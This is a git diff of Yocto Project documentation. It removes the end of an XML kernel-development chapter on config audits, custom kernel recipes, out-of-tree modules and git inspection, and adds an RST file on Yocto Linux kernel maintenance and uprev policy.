- From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
- /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
- Requested value: CONFIG_SCHED_SMT=y
- Actual value:
-
-
-
- NOTE: Tasks Summary: Attempted 288 tasks of which 285 didn't need to be rerun and all succeeded.
-
- Summary: There were 3 WARNING messages shown.
- </literallayout>
- <note>
- The previous output example has artificial line breaks
- to make it more readable.
- </note>
- </para>
-
- <para>
- The output describes the various problems that you can
- encounter along with where to find the offending configuration
- items.
- You can use the information in the logs to adjust your
- configuration files and then repeat the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configcheck'><filename>do_kernel_configcheck</filename></ulink>
- tasks until they produce no warnings.
- </para>
-
- <para>
- For more information on how to use the
- <filename>menuconfig</filename> tool, see the
- "<link linkend='using-menuconfig'>Using <filename>menuconfig</filename></link>"
- section.
- </para>
- </section>
-
- <section id='fine-tuning-the-kernel-configuration-file'>
- <title>Fine-Tuning the Kernel Configuration File</title>
-
- <para>
- You can make sure the <filename>.config</filename> file is as
- lean or efficient as possible by reading the output of the
- kernel configuration fragment audit, noting any issues, making
- changes to correct the issues, and then repeating.
- </para>
-
- <para>
- As part of the kernel build process, the
- <filename>do_kernel_configcheck</filename> task runs.
- This task validates the kernel configuration by checking the
- final <filename>.config</filename> file against the input
- files.
- During the check, the task produces warning messages for the
- following issues:
- <itemizedlist>
- <listitem><para>
- Requested options that did not make the final
- <filename>.config</filename> file.
- </para></listitem>
- <listitem><para>
- Configuration items that appear twice in the same
- configuration fragment.
- </para></listitem>
- <listitem><para>
- Configuration items tagged as "required" that were
- overridden.
- </para></listitem>
- <listitem><para>
- A board overrides a non-board specific option.
- </para></listitem>
- <listitem><para>
- Listed options not valid for the kernel being
- processed.
- In other words, the option does not appear anywhere.
- </para></listitem>
- </itemizedlist>
- <note>
- The <filename>do_kernel_configcheck</filename> task can
- also optionally report if an option is overridden during
- processing.
- </note>
- </para>
-
- <para>
- For each output warning, a message points to the file
- that contains a list of the options and a pointer to the
- configuration fragment that defines them.
- Collectively, the files are the key to streamlining the
- configuration.
- </para>
-
- <para>
- To streamline the configuration, do the following:
- <orderedlist>
- <listitem><para>
- <emphasis>Use a Working Configuration:</emphasis>
- Start with a full configuration that you
- know works.
- Be sure the configuration builds and boots
- successfully.
- Use this configuration file as your baseline.
- </para></listitem>
- <listitem><para>
- <emphasis>Run Configure and Check Tasks:</emphasis>
- Separately run the
- <filename>do_kernel_configme</filename> and
- <filename>do_kernel_configcheck</filename> tasks:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c kernel_configme -f
- $ bitbake linux-yocto -c kernel_configcheck -f
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Process the Results:</emphasis>
- Take the resulting list of files from the
- <filename>do_kernel_configcheck</filename> task
- warnings and do the following:
- <itemizedlist>
- <listitem><para>
- Drop values that are redefined in the fragment
- but do not change the final
- <filename>.config</filename> file.
- </para></listitem>
- <listitem><para>
- Analyze and potentially drop values from the
- <filename>.config</filename> file that override
- required configurations.
- </para></listitem>
- <listitem><para>
- Analyze and potentially remove non-board
- specific options.
- </para></listitem>
- <listitem><para>
- Remove repeated and invalid options.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Re-Run Configure and Check Tasks:</emphasis>
- After you have worked through the output of the kernel
- configuration audit, you can re-run the
- <filename>do_kernel_configme</filename> and
- <filename>do_kernel_configcheck</filename> tasks to
- see the results of your changes.
- If you have more issues, you can deal with them as
- described in the previous step.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- Iteratively working through steps two through four eventually
- yields a minimal, streamlined configuration file.
- Once you have the best <filename>.config</filename>, you can
- build the Linux Yocto kernel.
- </para>
- </section>
- </section>
-
- <section id='expanding-variables'>
- <title>Expanding Variables</title>
-
- <para>
- Sometimes it is helpful to determine what a variable expands
- to during a build.
- You can do examine the values of variables by examining the
- output of the <filename>bitbake -e</filename> command.
- The output is long and is more easily managed in a text file,
- which allows for easy searches:
- <literallayout class='monospaced'>
- $ bitbake -e virtual/kernel > <replaceable>some_text_file</replaceable>
- </literallayout>
- Within the text file, you can see exactly how each variable is
- expanded and used by the OpenEmbedded build system.
- </para>
- </section>
-
- <section id='working-with-a-dirty-kernel-version-string'>
- <title>Working with a "Dirty" Kernel Version String</title>
-
- <para>
- If you build a kernel image and the version string has a
- "+" or a "-dirty" at the end, uncommitted modifications exist
- in the kernel's source directory.
- Follow these steps to clean up the version string:
- <orderedlist>
- <listitem><para>
- <emphasis>Discover the Uncommitted Changes:</emphasis>
- Go to the kernel's locally cloned Git repository
- (source directory) and use the following Git command
- to list the files that have been changed, added, or
- removed:
- <literallayout class='monospaced'>
- $ git status
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Commit the Changes:</emphasis>
- You should commit those changes to the kernel source
- tree regardless of whether or not you will save,
- export, or use the changes:
- <literallayout class='monospaced'>
- $ git add
- $ git commit -s -a -m "getting rid of -dirty"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Rebuild the Kernel Image:</emphasis>
- Once you commit the changes, rebuild the kernel.</para>
-
- <para>Depending on your particular kernel development
- workflow, the commands you use to rebuild the
- kernel might differ.
- For information on building the kernel image when
- using <filename>devtool</filename>, see the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- section.
- For information on building the kernel image when
- using Bitbake, see the
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- section.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='working-with-your-own-sources'>
- <title>Working With Your Own Sources</title>
-
- <para>
- If you cannot work with one of the Linux kernel
- versions supported by existing linux-yocto recipes, you can
- still make use of the Yocto Project Linux kernel tooling by
- working with your own sources.
- When you use your own sources, you will not be able to
- leverage the existing kernel
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink> and
- stabilization work of the linux-yocto sources.
- However, you will be able to manage your own Metadata in the same
- format as the linux-yocto sources.
- Maintaining format compatibility facilitates converging with
- linux-yocto on a future, mutually-supported kernel version.
- </para>
-
- <para>
- To help you use your own sources, the Yocto Project provides a
- linux-yocto custom recipe
- (<filename>linux-yocto-custom.bb</filename>) that uses
- <filename>kernel.org</filename> sources
- and the Yocto Project Linux kernel tools for managing
- kernel Metadata.
- You can find this recipe in the
- <filename>poky</filename> Git repository of the
- Yocto Project <ulink url='&YOCTO_GIT_URL;'>Source Repository</ulink>
- at:
- <literallayout class="monospaced">
- poky/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
- </literallayout>
- </para>
-
- <para>
- Here are some basic steps you can use to work with your own
- sources:
- <orderedlist>
- <listitem><para>
- <emphasis>Create a Copy of the Kernel Recipe:</emphasis>
- Copy the <filename>linux-yocto-custom.bb</filename>
- recipe to your layer and give it a meaningful name.
- The name should include the version of the Yocto Linux
- kernel you are using (e.g.
- <filename>linux-yocto-myproject_4.12.bb</filename>,
- where "4.12" is the base version of the Linux kernel
- with which you would be working).
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Directory for Your Patches:</emphasis>
- In the same directory inside your layer, create a matching
- directory to store your patches and configuration files
- (e.g. <filename>linux-yocto-myproject</filename>).
- </para></listitem>
- <listitem><para>
- <emphasis>Ensure You Have Configurations:</emphasis>
- Make sure you have either a <filename>defconfig</filename>
- file or configuration fragment files in your layer.
- When you use the <filename>linux-yocto-custom.bb</filename>
- recipe, you must specify a configuration.
- If you do not have a <filename>defconfig</filename> file,
- you can run the following:
- <literallayout class='monospaced'>
- $ make defconfig
- </literallayout>
- After running the command, copy the resulting
- <filename>.config</filename> file to the
- <filename>files</filename> directory in your layer
- as "defconfig" and then add it to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable in the recipe.</para>
-
- <para>Running the <filename>make defconfig</filename>
- command results in the default configuration for your
- architecture as defined by your kernel.
- However, no guarantee exists that this configuration is
- valid for your use case, or that your board will even boot.
- This is particularly true for non-x86 architectures.</para>
-
- <para>To use non-x86 <filename>defconfig</filename> files,
- you need to be more specific and find one that matches your
- board (i.e. for arm, you look in
- <filename>arch/arm/configs</filename> and use the one that
- is the best starting point for your board).
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the Recipe:</emphasis>
- Edit the following variables in your recipe as appropriate
- for your project:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>:
- The <filename>SRC_URI</filename> should specify
- a Git repository that uses one of the supported Git
- fetcher protocols (i.e. <filename>file</filename>,
- <filename>git</filename>, <filename>http</filename>,
- and so forth).
- The <filename>SRC_URI</filename> variable should
- also specify either a <filename>defconfig</filename>
- file or some configuration fragment files.
- The skeleton recipe provides an example
- <filename>SRC_URI</filename> as a syntax reference.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_VERSION'><filename>LINUX_VERSION</filename></ulink>:
- The Linux kernel version you are using (e.g.
- "4.12").
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_VERSION_EXTENSION'><filename>LINUX_VERSION_EXTENSION</filename></ulink>:
- The Linux kernel
- <filename>CONFIG_LOCALVERSION</filename> that is
- compiled into the resulting kernel and visible
- through the <filename>uname</filename> command.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>:
- The commit ID from which you want to build.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>:
- Treat this variable the same as you would in any
- other recipe.
- Increment the variable to indicate to the
- OpenEmbedded build system that the recipe has
- changed.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
- The default <filename>PV</filename> assignment is
- typically adequate.
- It combines the <filename>LINUX_VERSION</filename>
- with the Source Control Manager (SCM) revision
- as derived from the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>
- variable.
- The combined results are a string with the
- following form:
- <literallayout class='monospaced'>
- 3.19.11+git1+68a635bf8dfb64b02263c1ac80c948647cc76d5f_1+218bd8d2022b9852c60d32f0d770931e3cf343e2
- </literallayout>
- While lengthy, the extra verbosity in
- <filename>PV</filename> helps ensure you are using
- the exact sources from which you intend to build.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></ulink>:
- A list of the machines supported by your new recipe.
- This variable in the example recipe is set
- by default to a regular expression that matches
- only the empty string, "(^$)".
- This default setting triggers an explicit build
- failure.
- You must change it to match a list of the machines
- that your new recipe supports.
- For example, to support the
- <filename>qemux86</filename> and
- <filename>qemux86-64</filename> machines, use
- the following form:
- <literallayout class='monospaced'>
- COMPATIBLE_MACHINE = "qemux86|qemux86-64"
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Customize Your Recipe as Needed:</emphasis>
- Provide further customizations to your recipe
- as needed just as you would customize an existing
- linux-yocto recipe.
- See the
- "<link linkend='modifying-an-existing-recipe'>Modifying an Existing Recipe</link>"
- section for information.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='working-with-out-of-tree-modules'>
- <title>Working with Out-of-Tree Modules</title>
-
- <para>
- This section describes steps to build out-of-tree modules on
- your target and describes how to incorporate out-of-tree modules
- in the build.
- </para>
-
- <section id='building-out-of-tree-modules-on-the-target'>
- <title>Building Out-of-Tree Modules on the Target</title>
-
- <para>
- While the traditional Yocto Project development model would be
- to include kernel modules as part of the normal build
- process, you might find it useful to build modules on the
- target.
- This could be the case if your target system is capable
- and powerful enough to handle the necessary compilation.
- Before deciding to build on your target, however, you should
- consider the benefits of using a proper cross-development
- environment from your build host.
- </para>
-
- <para>
- If you want to be able to build out-of-tree modules on
- the target, there are some steps you need to take
- on the target that is running your SDK image.
- Briefly, the <filename>kernel-dev</filename> package
- is installed by default on all
- <filename>*.sdk</filename> images and the
- <filename>kernel-devsrc</filename> package is installed
- on many of the <filename>*.sdk</filename> images.
- However, you need to create some scripts prior to
- attempting to build the out-of-tree modules on the target
- that is running that image.
- </para>
-
- <para>
- Prior to attempting to build the out-of-tree modules,
- you need to be on the target as root and you need to
- change to the <filename>/usr/src/kernel</filename> directory.
- Next, <filename>make</filename> the scripts:
- <literallayout class='monospaced'>
- # cd /usr/src/kernel
- # make scripts
- </literallayout>
- Because all SDK image recipes include
- <filename>dev-pkgs</filename>, the
- <filename>kernel-dev</filename> packages will be installed
- as part of the SDK image and the
- <filename>kernel-devsrc</filename> packages will be installed
- as part of applicable SDK images.
- The SDK uses the scripts when building out-of-tree
- modules.
- Once you have switched to that directory and created the
- scripts, you should be able to build your out-of-tree modules
- on the target.
- </para>
- </section>
-
- <section id='incorporating-out-of-tree-modules'>
- <title>Incorporating Out-of-Tree Modules</title>
-
- <para>
- While it is always preferable to work with sources integrated
- into the Linux kernel sources, if you need an external kernel
- module, the <filename>hello-mod.bb</filename> recipe is
- available as a template from which you can create your
- own out-of-tree Linux kernel module recipe.
- </para>
-
- <para>
- This template recipe is located in the
- <filename>poky</filename> Git repository of the
- Yocto Project <ulink url='&YOCTO_GIT_URL;'>Source Repository</ulink>
- at:
- <literallayout class="monospaced">
- poky/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
- </literallayout>
- </para>
-
- <para>
- To get started, copy this recipe to your layer and give it a
- meaningful name (e.g. <filename>mymodule_1.0.bb</filename>).
- In the same directory, create a new directory named
- <filename>files</filename> where you can store any source files,
- patches, or other files necessary for building
- the module that do not come with the sources.
- Finally, update the recipe as needed for the module.
- Typically, you will need to set the following variables:
- <itemizedlist>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-DESCRIPTION'><filename>DESCRIPTION</filename></ulink>
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE*</filename></ulink>
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Depending on the build system used by the module sources,
- you might need to make some adjustments.
- For example, a typical module <filename>Makefile</filename>
- looks much like the one provided with the
- <filename>hello-mod</filename> template:
- <literallayout class='monospaced'>
- obj-m := hello.o
-
- SRC := $(shell pwd)
-
- all:
- $(MAKE) -C $(KERNEL_SRC) M=$(SRC)
-
- modules_install:
- $(MAKE) -C $(KERNEL_SRC) M=$(SRC) modules_install
- ...
- </literallayout>
- </para>
-
- <para>
- The important point to note here is the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_SRC'><filename>KERNEL_SRC</filename></ulink>
- variable.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-module'><filename>module</filename></ulink>
- class sets this variable and the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_PATH'><filename>KERNEL_PATH</filename></ulink>
- variable to
- <filename>${<ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></ulink>}</filename>
- with the necessary Linux kernel build information to build
- modules.
- If your module <filename>Makefile</filename> uses a different
- variable, you might want to override the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
- step, or create a patch to
- the <filename>Makefile</filename> to work with the more typical
- <filename>KERNEL_SRC</filename> or
- <filename>KERNEL_PATH</filename> variables.
- </para>
-
- <para>
- After you have prepared your recipe, you will likely want to
- include the module in your images.
- To do this, see the documentation for the following variables in
- the Yocto Project Reference Manual and set one of them
- appropriately for your machine configuration file:
- <itemizedlist>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</filename></ulink>
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RDEPENDS'><filename>MACHINE_EXTRA_RDEPENDS</filename></ulink>
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RRECOMMENDS'><filename>MACHINE_EXTRA_RRECOMMENDS</filename></ulink>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Modules are often not required for boot and can be excluded from
- certain build configurations.
- The following allows for the most flexibility:
- <literallayout class='monospaced'>
- MACHINE_EXTRA_RRECOMMENDS += "kernel-module-mymodule"
- </literallayout>
- The value is derived by appending the module filename without
- the <filename>.ko</filename> extension to the string
- "kernel-module-".
- </para>
-
- <para>
- Because the variable is
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>
- and not a
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
- variable, the build will not fail if this module is not
- available to include in the image.
- </para>
- </section>
- </section>
-
-
- <section id='inspecting-changes-and-commits'>
- <title>Inspecting Changes and Commits</title>
-
- <para>
- A common question when working with a kernel is:
- "What changes have been applied to this tree?"
- Rather than using "grep" across directories to see what has
- changed, you can use Git to inspect or search the kernel tree.
- Using Git is an efficient way to see what has changed in the tree.
- </para>
-
- <section id='what-changed-in-a-kernel'>
- <title>What Changed in a Kernel?</title>
-
- <para>
- Following are a few examples that show how to use Git
- commands to examine changes.
- These examples are by no means the only way to see changes.
- <note>
- In the following examples, unless you provide a commit
- range, <filename>kernel.org</filename> history is blended
- with Yocto Project kernel changes.
- You can form ranges by using branch names from the
- kernel tree as the upper and lower commit markers with
- the Git commands.
- You can see the branch names through the web interface
- to the Yocto Project source repositories at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- </note>
- To see a full range of the changes, use the
- <filename>git whatchanged</filename> command and specify a
- commit range for the branch
- (<replaceable>commit</replaceable><filename>..</filename><replaceable>commit</replaceable>).
- </para>
-
- <para>
- Here is an example that looks at what has changed in the
- <filename>emenlow</filename> branch of the
- <filename>linux-yocto-3.19</filename> kernel.
- The lower commit range is the commit associated with the
- <filename>standard/base</filename> branch, while
- the upper commit range is the commit associated with the
- <filename>standard/emenlow</filename> branch.
- <literallayout class='monospaced'>
- $ git whatchanged origin/standard/base..origin/standard/emenlow
- </literallayout>
- </para>
-
- <para>
- To see short, one line summaries of changes use the
- <filename>git log</filename> command:
- <literallayout class='monospaced'>
- $ git log --oneline origin/standard/base..origin/standard/emenlow
- </literallayout>
- </para>
-
- <para>
- Use this command to see code differences for the changes:
- <literallayout class='monospaced'>
- $ git diff origin/standard/base..origin/standard/emenlow
- </literallayout>
- </para>
-
- <para>
- Use this command to see the commit log messages and the
- text differences:
- <literallayout class='monospaced'>
- $ git show origin/standard/base..origin/standard/emenlow
- </literallayout>
- </para>
-
- <para>
- Use this command to create individual patches for
- each change.
- Here is an example that that creates patch files for each
- commit and places them in your <filename>Documents</filename>
- directory:
- <literallayout class='monospaced'>
- $ git format-patch -o $HOME/Documents origin/standard/base..origin/standard/emenlow
- </literallayout>
- </para>
- </section>
-
- <section id='showing-a-particular-feature-or-branch-change'>
- <title>Showing a Particular Feature or Branch Change</title>
-
- <para>
- Tags in the Yocto Project kernel tree divide changes for
- significant features or branches.
- The <filename>git show</filename>&nbsp;<replaceable>tag</replaceable>
- command shows changes based on a tag.
- Here is an example that shows <filename>systemtap</filename>
- changes:
- <literallayout class='monospaced'>
- $ git show systemtap
- </literallayout>
- You can use the
- <filename>git branch --contains</filename>&nbsp;<replaceable>tag</replaceable>
- command to show the branches that contain a particular feature.
- This command shows the branches that contain the
- <filename>systemtap</filename> feature:
- <literallayout class='monospaced'>
- $ git branch --contains systemtap
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='adding-recipe-space-kernel-features'>
- <title>Adding Recipe-Space Kernel Features</title>
-
- <para>
- You can add kernel features in the
- <link linkend='recipe-space-metadata'>recipe-space</link> by
- using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
- variable and by specifying the feature's <filename>.scc</filename>
- file path in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statement.
- When you add features using this method, the OpenEmbedded build
- system checks to be sure the features are present.
- If the features are not present, the build stops.
- Kernel features are the last elements processed for configuring
- and patching the kernel.
- Therefore, adding features in this manner is a way
- to enforce specific features are present and enabled
- without needing to do a full audit of any other layer's additions
- to the <filename>SRC_URI</filename> statement.
- </para>
-
- <para>
- You add a kernel feature by providing the feature as part of the
- <filename>KERNEL_FEATURES</filename> variable and by providing the
- path to the feature's <filename>.scc</filename> file, which is
- relative to the root of the kernel Metadata.
- The OpenEmbedded build system searches all forms of kernel
- Metadata on the <filename>SRC_URI</filename> statement regardless
- of whether the Metadata is in the "kernel-cache", system kernel
- Metadata, or a recipe-space Metadata (i.e. part of the kernel
- recipe).
- See the
- "<link linkend='kernel-metadata-location'>Kernel Metadata Location</link>"
- section for additional information.
- </para>
-
- <para>
- When you specify the feature's <filename>.scc</filename> file
- on the <filename>SRC_URI</filename> statement, the OpenEmbedded
- build system adds the directory of that
- <filename>.scc</filename> file along with all its subdirectories
- to the kernel feature search path.
- Because subdirectories are searched, you can reference a single
- <filename>.scc</filename> file in the
- <filename>SRC_URI</filename> statement to reference multiple kernel
- features.
- </para>
-
- <para>
- Consider the following example that adds the "test.scc" feature
- to the build.
- <orderedlist>
- <listitem><para>
- <emphasis>Create the Feature File:</emphasis>
- Create a <filename>.scc</filename> file and locate it
- just as you would any other patch file,
- <filename>.cfg</filename> file, or fetcher item
- you specify in the <filename>SRC_URI</filename>
- statement.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- You must add the directory of the
- <filename>.scc</filename> file to the fetcher's
- search path in the same manner as you would
- add a <filename>.patch</filename> file.
- </para></listitem>
- <listitem><para>
- You can create additional
- <filename>.scc</filename> files beneath the
- directory that contains the file you are
- adding.
- All subdirectories are searched during the
- build as potential feature directories.
- </para></listitem>
- </itemizedlist>
- </note>
- Continuing with the example, suppose the "test.scc"
- feature you are adding has a
- <filename>test.scc</filename> file in the following
- directory:
- <literallayout class='monospaced'>
- <replaceable>my_recipe</replaceable>
- |
- +-linux-yocto
- |
- +-test.cfg
- +-test.scc
- </literallayout>
- In this example, the <filename>linux-yocto</filename>
- directory has both the feature
- <filename>test.scc</filename> file and a similarly
- named configuration fragment file
- <filename>test.cfg</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis>Add the Feature File to <filename>SRC_URI</filename>:</emphasis>
- Add the <filename>.scc</filename> file to the
- recipe's <filename>SRC_URI</filename> statement:
- <literallayout class='monospaced'>
- SRC_URI_append = " file://test.scc"
- </literallayout>
- The leading space before the path is important as the
- path is appended to the existing path.
- </para></listitem>
- <listitem><para>
- <emphasis>Specify the Feature as a Kernel Feature:</emphasis>
- Use the <filename>KERNEL_FEATURES</filename> statement
- to specify the feature as a kernel feature:
- <literallayout class='monospaced'>
- KERNEL_FEATURES_append = " test.scc"
- </literallayout>
- The OpenEmbedded build system processes the kernel feature
- when it builds the kernel.
- <note>
- If other features are contained below "test.scc",
- then their directories are relative to the directory
- containing the <filename>test.scc</filename> file.
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-concepts-appx.rst b/documentation/kernel-dev/kernel-dev-concepts-appx.rst
new file mode 100644
index 0000000000..681faee522
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-concepts-appx.rst
@@ -0,0 +1,425 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************************
+Advanced Kernel Concepts
+************************
+
+.. _kernel-big-picture:
+
+Yocto Project Kernel Development and Maintenance
+================================================
+
+Kernels available through the Yocto Project (Yocto Linux kernels), like
+other kernels, are based off the Linux kernel releases from
+https://www.kernel.org. At the beginning of a major Linux kernel
+development cycle, the Yocto Project team chooses a Linux kernel based
+on factors such as release timing, the anticipated release timing of
+final upstream ``kernel.org`` versions, and Yocto Project feature
+requirements. Typically, the Linux kernel chosen is in the final stages
+of development by the Linux community. In other words, the Linux kernel
+is in the release candidate or "rc" phase and has yet to reach final
+release. But, by being in the final stages of external development, the
+team knows that the ``kernel.org`` final release will clearly be within
+the early stages of the Yocto Project development window.
+
+This balance allows the Yocto Project team to deliver the most
+up-to-date Yocto Linux kernel possible, while still ensuring that the
+team has a stable official release for the baseline Linux kernel
+version.
+
+As implied earlier, the ultimate source for Yocto Linux kernels are
+released kernels from ``kernel.org``. In addition to a foundational
+kernel from ``kernel.org``, the available Yocto Linux kernels contain a
+mix of important new mainline developments, non-mainline developments
+(when no alternative exists), Board Support Package (BSP) developments,
+and custom features. These additions result in a commercially released
+Yocto Project Linux kernel that caters to specific embedded designer
+needs for targeted hardware.
+
+You can find a web interface to the Yocto Linux kernels in the
+:ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+at :yocto_git:`/`. If you look at the interface, you will see to
+the left a grouping of Git repositories titled "Yocto Linux Kernel".
+Within this group, you will find several Linux Yocto kernels developed
+and included with Yocto Project releases:
+
+- *linux-yocto-4.1:* The stable Yocto Project kernel to use with
+ the Yocto Project Release 2.0. This kernel is based on the Linux 4.1
+ released kernel.
+
+- *linux-yocto-4.4:* The stable Yocto Project kernel to use with
+ the Yocto Project Release 2.1. This kernel is based on the Linux 4.4
+ released kernel.
+
+- *linux-yocto-4.6:* A temporary kernel that is not tied to any
+ Yocto Project release.
+
+- *linux-yocto-4.8:* The stable yocto Project kernel to use with
+ the Yocto Project Release 2.2.
+
+- *linux-yocto-4.9:* The stable Yocto Project kernel to use with
+ the Yocto Project Release 2.3. This kernel is based on the Linux 4.9
+ released kernel.
+
+- *linux-yocto-4.10:* The default stable Yocto Project kernel to
+ use with the Yocto Project Release 2.3. This kernel is based on the
+ Linux 4.10 released kernel.
+
+- *linux-yocto-4.12:* The default stable Yocto Project kernel to
+ use with the Yocto Project Release 2.4. This kernel is based on the
+ Linux 4.12 released kernel.
+
+- *yocto-kernel-cache:* The ``linux-yocto-cache`` contains patches
+ and configurations for the linux-yocto kernel tree. This repository
+ is useful when working on the linux-yocto kernel. For more
+ information on this "Advanced Kernel Metadata", see the
+ ":doc:`kernel-dev-advanced`" Chapter.
+
+- *linux-yocto-dev:* A development kernel based on the latest
+ upstream release candidate available.
+
+.. note::
+
+ Long Term Support Initiative (LTSI) for Yocto Linux kernels is as
+ follows:
+
+ - For Yocto Project releases 1.7, 1.8, and 2.0, the LTSI kernel is
+ ``linux-yocto-3.14``.
+
+ - For Yocto Project releases 2.1, 2.2, and 2.3, the LTSI kernel is
+ ``linux-yocto-4.1``.
+
+ - For Yocto Project release 2.4, the LTSI kernel is
+ ``linux-yocto-4.9``
+
+ - ``linux-yocto-4.4`` is an LTS kernel.
+
+Once a Yocto Linux kernel is officially released, the Yocto Project team
+goes into their next development cycle, or upward revision (uprev)
+cycle, while still continuing maintenance on the released kernel. It is
+important to note that the most sustainable and stable way to include
+feature development upstream is through a kernel uprev process.
+Back-porting hundreds of individual fixes and minor features from
+various kernel versions is not sustainable and can easily compromise
+quality.
+
+During the uprev cycle, the Yocto Project team uses an ongoing analysis
+of Linux kernel development, BSP support, and release timing to select
+the best possible ``kernel.org`` Linux kernel version on which to base
+subsequent Yocto Linux kernel development. The team continually monitors
+Linux community kernel development to look for significant features of
+interest. The team does consider back-porting large features if they
+have a significant advantage. User or community demand can also trigger
+a back-port or creation of new functionality in the Yocto Project
+baseline kernel during the uprev cycle.
+
+Generally speaking, every new Linux kernel both adds features and
+introduces new bugs. These consequences are the basic properties of
+upstream Linux kernel development and are managed by the Yocto Project
+team's Yocto Linux kernel development strategy. It is the Yocto Project
+team's policy to not back-port minor features to the released Yocto
+Linux kernel. They only consider back-porting significant technological
+jumps - and, that is done after a complete gap analysis. The reason
+for this policy is that back-porting any small to medium sized change
+from an evolving Linux kernel can easily create mismatches,
+incompatibilities and very subtle errors.
+
+The policies described in this section result in both a stable and a
+cutting edge Yocto Linux kernel that mixes forward ports of existing
+Linux kernel features and significant and critical new functionality.
+Forward porting Linux kernel functionality into the Yocto Linux kernels
+available through the Yocto Project can be thought of as a "micro
+uprev". The many "micro uprevs" produce a Yocto Linux kernel version
+with a mix of important new mainline, non-mainline, BSP developments and
+feature integrations. This Yocto Linux kernel gives insight into new
+features and allows focused amounts of testing to be done on the kernel,
+which prevents surprises when selecting the next major uprev. The
+quality of these cutting edge Yocto Linux kernels is evolving and the
+kernels are used in leading edge feature and BSP development.
+
